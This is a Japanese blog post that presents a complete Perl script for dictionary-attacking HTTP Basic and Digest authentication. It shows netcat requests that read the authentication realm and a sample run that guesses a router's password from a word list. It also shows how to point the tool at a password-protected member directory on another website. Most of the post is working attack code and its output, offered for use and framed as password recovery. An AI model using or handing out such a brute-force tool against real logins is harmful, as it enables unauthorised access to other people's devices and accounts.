ルーターのパスワードを忘れたときのために

/ Perl / Comment[0]
medusaじゃdigest非対応だったりディレクトリの指定が出来なかったり色々あれだから
basic,digest認証を辞書アタックする簡単なスクリプト書いたー
#!/usr/bin/perl
use LWP;

($host,$realm,$user,$dic,$uri) = @ARGV;
if(!@ARGV) {
print "Usage: ./bfhttp <host:port> <realm> <user> <dic>\n";
print "Example: ./bfhttp 192.168.1.1:80 PR-S300SE user pass.dic\n";
exit;
}

open(F, $dic) or die "$!";
while($line = <F>) {
chomp($line);
print "Trying... \"$line\"\n";
$ua = LWP::UserAgent->new;
$ua->credentials(
$host,
$realm,
$user,
$line
);
$res = $ua->get("http://$host/$uri");
if($res->is_success) {
print "\nPassword is \"$line\"\n\n";
exit;
}
}
close(F);

realmを取得
$ nc 10.25.0.1 80
HEAD / HTTP/1.0

HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Sun Oct 30 12:00:55 2011
WWW-Authenticate: Basic realm="Default: admin/password"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html

realmを指定して実行
$ ./bfhttp 10.25.0.1:80 "Default: admin/password" admin pass.dic
Trying... "0000"
Trying... "1111"
Trying... "1223334444"
Trying... "122333444455555"
Trying... "1234"
Trying... "12345678"
Trying... "123xxxyyy"
Trying... "DEFAULT"
Trying... "Default"
Trying... "LOGIN"
Trying... "Password"
Trying... "ROOT"
Trying... "SERVER"
Trying... "TEST"
Trying... "User"
Trying... "adam"
Trying... "admin"
Trying... "administrator"
Trying... "backup"
Trying... "config"
Trying... "cracker"
Trying... "default"
Trying... "falcon"
Trying... "ftp"
Trying... "ftpuser"
Trying... "hacker"
Trying... "http"
Trying... "john"
Trying... "linux"
Trying... "login"
Trying... "master"
Trying... "netman"
Trying... "owner"
Trying... "p@$$w0rd"
Trying... "pass"
Trying... "password"

Password is "password"
こんな感じ


ディレクトリを指定するには、
認証が掛かってるディレクトリに対してheadリクエストでrealmを取得して、
$ nc www.hogehoge.jp 80
HEAD 2011_hoge/member/ HTTP/1.0

HTTP/1.1 401 Authorization Required
Date: Sun, 30 Oct 2011 03:04:45 GMT
Server: Apache/2.2.17
WWW-Authenticate: Basic realm="Check Members"
Connection: close
Content-Type: text/html; charset=iso-8859-1

取得したrealmと、最後のオプションでディレクトリを指定して実行
$ ./bfhttp www.hogehoge.jp:80 "Check Members" user pass.dic 2011_hoge/member/
という感じで
関連記事

コメント

:
:
:
:
:
管理人のみ表示を許可